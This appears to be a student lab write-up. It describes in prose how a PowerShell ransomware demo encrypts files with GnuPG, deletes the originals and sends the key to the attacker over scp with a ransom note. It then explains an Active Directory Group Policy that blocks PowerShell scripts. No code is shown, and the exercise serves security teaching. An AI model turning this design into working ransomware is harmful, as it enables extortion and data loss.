RANSOMWARE SCRIPT DEMO LINK

RANSOMWARE MITIGATION DEMO LINK

Ransomware Scripts Creation:

Encryption Script

The creation of the ransomware script involved using the script to download two tools from online, GNUPG and Posh-SSH. GNUPG was used for the encryption of the files within the script and Posh-SSH was used to send the Symmetric key and encrypted file list back over. Within the script, the original files are deleted and replaced with the encrypted ones. The victim then has to pay the attacker for them to scp the symmetric key and the encrypted file list back over. The script throws many errors but otherwise does run. The script was not able to be configured to use the public key to encrypt the symmetric key in the script, so the symmetric key is immediately scp'd back to the attacker and is deleted on the victim PC. A message notifies the user that their files have been encrypted and they must make a payment to a (fake) bitcoin address.

Sources for information in the script are in Louis Najdek's reflection.

Ransomware Code

Decryption Script

The decryption script requires the symmetric key and the encrypted file list in order to function. When it has those, it deletes the encrypted files and replaces them with the unencrypted versions. It does so by deleting all files with the .gpg extension. A message then notifies the user that their files have been decrypted.

Decryption Script

Ransomware Mitigation Process

In order to mitigate the threat of a Windows Powershell Script Ransomware attack, some things had to be done to the mgmt VM. Mgmt is a windows machine with access to a server manager. To help create a mitigation, the mgmt server had to become and Active Directory. This was done by going into the "Manage" tag and selecting the "Add Roles and Features" option. From there, select the current machine (mgmt which will be known by its hostname) and in the add roles section select "Active Directory Services". This should add everything that is needed for the system. Once done, select install and let it install everything. It will finish, but not be complete because one more step is needed. That step is to promote the mgmt server into the Active Directory. During this process of promoting mgmt into an Active Directory you will be required to create a "forest", which is just a form of domain name/group. Name it whatever you want, traditionally its named yourname.local. Follow the instructions of the "wizard" for the promotion process, and all should be good at this point. Once done, restart the mgmt computer. This is important. After the computer is restarted and updated as the Active Directory, log back in as the admin user and go to the "Tools" tab. From there, simply select "Active Directory Users and Computers". This allows you to add a user or two to the computer. Keep in mind that for now, these users will need to be added to the admin group to allow for login. In the Users folder, just right-click and select new Users. From there just add in the name, password, and username of the new user as you see fit. Once done, we are going to add an OU or Organization Unit. These folders allow for unique rules and policies to be applied to them. In the yourname.local forest/file, right-click and select new Organization Unit (OU). Name this OU something like "Protected Users". When done, move your newly made user into this file. Then we go back to the server manager. Select "Tools" and then "Group Policy". This is where the mitigation rule is applied. In the opened up window, select the OU "Protected Users" and right-click. One of the options should be to "Link and Create a new GPO". Select this option to create a new Group Policy on the OU. Name it "Restricted Powershell Scripts". Then we will right click this rule and edit it. Once the new window for this process is open, select the following options: User -> Administrative Template -> Windows Components -> Windows Powershell. From there, select "Turn on Script Execution". This option, if you set it to disabled, will automatically set Powershell's execution policy to Restricted, which prevents any Powershell scripts from running as the protected users. Apply this change and exit out of the windows. To test if this worked, log out and log in as the protected user and attempt to run a simple Powershell Script. Assuming nothing goes wrong the script will fail to run on that user, but will successfully run under another user. This is how we were able to mitigate a Powershell Script Ransomware attack.